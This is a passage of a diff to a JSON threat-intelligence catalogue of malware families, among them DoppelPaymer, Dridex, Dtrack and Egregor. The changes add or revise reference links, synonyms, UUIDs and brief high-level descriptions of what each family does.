"https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "16a76dcf-92cb-4371-8440-d6b3adbb081b", + "value": "DoppelPaymer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", - "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", - "https://research.checkpoint.com/dorkbot-an-investigation/", - "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html" + "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/", + "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", + "https://research.checkpoint.com/dorkbot-an-investigation/" ], "synonyms": [], "type": [] @@ -7192,7 +13844,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" ], "synonyms": [], "type": [] @@ -7200,14 +13853,44 @@ "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", "value": "Dorshel" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware", + "https://dissectingmalwa.re/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html" + ], + "synonyms": [ + "MZP Ransomware" + ], + "type": [] + }, + "uuid": "fc63c3ea-23ed-448d-9d66-3fb87ebea4ba", + "value": "Dot Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy", + "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", + "https://twitter.com/Int2e_/status/1294565186939092994" + ], + "synonyms": [ + "VALIDATOR" + ], + "type": [] + }, + "uuid": "46a523ca-be25-4f59-bc01-2c006c58bf80", + "value": "DoubleFantasy (Windows)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", - "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", + "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], @@ -7222,6 +13905,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" ], "synonyms": [ @@ -7237,6 +13921,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" ], "synonyms": [], @@ -7246,10 +13931,11 @@ "value": "Downeks" }, { - "description": "", + "description": "DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download\r\nand run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", + "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf", "http://www.clearskysec.com/charmingkitten/" ], "synonyms": [], @@ -7258,6 +13944,23 @@ "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", "value": "DownPaper" }, + { + "description": "simple tool to facilitate download and persistence of a next-stage tool; collects system information and metadata probably in an attempt to tell sandbox-environments apart from real targets on the server-side; uses domains of search engines like Google to check for Internet connectivity; XOR-based string obfuscation with a 16-byte key", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downrage", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" + ], + "synonyms": [ + "GAMEFISH" + ], + "type": [] + }, + "uuid": "61ac2821-9512-40c0-b41f-19dd2ea14c74", + "value": "Downrage" + }, { "description": "", "meta": { @@ -7270,13 +13973,32 @@ "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", "value": "DramNudge" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus", + "http://blog.nsfocus.net/stumbzarus-apt-lazarus/", + "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1ff3afab-8b3f-4b9c-90c7-61062d2dfe0b", + "value": "DRATzarus" + }, { "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", "https://lokalhost.pl/gozi_tree.txt", - "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122", + "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality", + "https://community.riskiq.com/article/30f22a00" ], "synonyms": [], "type": [] @@ -7290,15 +14012,61 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", + "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://viql.github.io/dridex/", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://en.wikipedia.org/wiki/Maksim_Yakubets", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", + "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", + "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://viql.github.io/dridex/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", + "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", + "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/" ], "synonyms": [], "type": [] @@ -7311,6 +14079,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/" @@ -7324,6 +14093,49 @@ "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d", "value": "DRIFTPIN" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion", + "https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan" + ], + "synonyms": [ + "Masson" + ], + "type": [] + }, + "uuid": "a752676f-06c1-426c-9fcb-6c199afc74af", + "value": "Dripion" + }, + { + "description": "Communicates via Google Drive.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean", + "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + ], + "synonyms": [ + "Google Drive RAT" + ], + "type": [] + }, + "uuid": "730a4e94-4f9b-4f34-a1f3-1c97d341332c", + "value": "DriveOcean" + }, + { + "description": "DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8c142a72-0efb-4850-b684-bc6b5300f85e", + "value": "DropBook" + }, { "description": "", "meta": { @@ -7340,16 +14152,27 @@ "value": "DROPSHOT" }, { - "description": "", + "description": "Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. \r\nIts core functionality includes operations to upload a file to the victim's computer, download a file from the victim's computer, dump disk volume data, persistence and more.\r\n\r\nA variant of Dtrack was found on Kudankulam Nuclear Power Plant (KNPP) which was used for a targeted attack.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack", + "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", + "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", + "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/my-name-is-dtrack/93338/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], "synonyms": [], "type": [] }, - "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor" + "uuid": "414f95e1-aabe-4aa9-b9be-53e0826f62c1", + "value": "Dtrack" }, { "description": "", @@ -7370,7 +14193,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", - "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", + "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" ], @@ -7410,6 +14233,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" ], "synonyms": [], @@ -7418,27 +14244,72 @@ "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", "value": "DuQu" }, + { + "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim\u2019s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman", + "https://twitter.com/Irfan_Asrar/status/1213544175355908096", + "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/", + "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report", + "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "daa3d1e4-9265-4f1c-b1bd-9242ac570681", + "value": "DUSTMAN" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.secureworks.com/research/threat-profiles/nickel-academy" + ], + "synonyms": [ + "Escad" ], - "synonyms": [], "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", "value": "Duuzer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack", + "https://content.fireeye.com/apt/rpt-apt38", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://github.com/649/APT38-DYEPACK" + ], + "synonyms": [ + "swift" + ], + "type": [] + }, + "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", + "value": "DYEPACK" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html", + "https://www.secureworks.com/research/threat-profiles/gold-blackburn", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ @@ -7449,11 +14320,26 @@ "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", "value": "Dyre" }, + { + "description": "FireEye describes EASYNIGHT is a loader observed used with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.\r\n\r\nExamples include a patched bcrypt.dll with no other modification than an additional import entry, in the observed case \"printwin.dll!gzwrite64\" (breaking the file signature).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight", + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0277b1e5-ea2d-4dec-bbaa-13e25a2d1f1c", + "value": "EASYNIGHT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], @@ -7462,6 +14348,58 @@ "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", "value": "EDA2" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor", + "https://www.intrinsec.com/egregor-prolock/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", + "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/", + "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", + "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia", + "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/", + "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html", + "https://www.group-ib.com/blog/egregor", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/", + "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/", + "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor", + "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf", + "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", + "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd84bc53-8684-4921-89c7-2cf49512bf61", + "value": "Egregor" + }, { "description": "", "meta": { @@ -7475,12 +14413,26 @@ "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", "value": "EHDevel" }, + { + "description": "The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-129A", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0f5a2ce1-b44f-4088-a4c0-04456a90c174", + "value": "ELECTRICFISH" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf", "https://www.clearskysec.com/iec/" ], "synonyms": [], @@ -7507,12 +14459,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", - "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", - "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.joesecurity.org/blog/8409877569366580427", + "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html", "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", - "https://www.joesecurity.org/blog/8409877569366580427" + "https://www.secureworks.com/research/threat-profiles/bronze-elgin", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf" + ], + "synonyms": [ + "EVILNEST" ], - "synonyms": [], "type": [] }, "uuid": 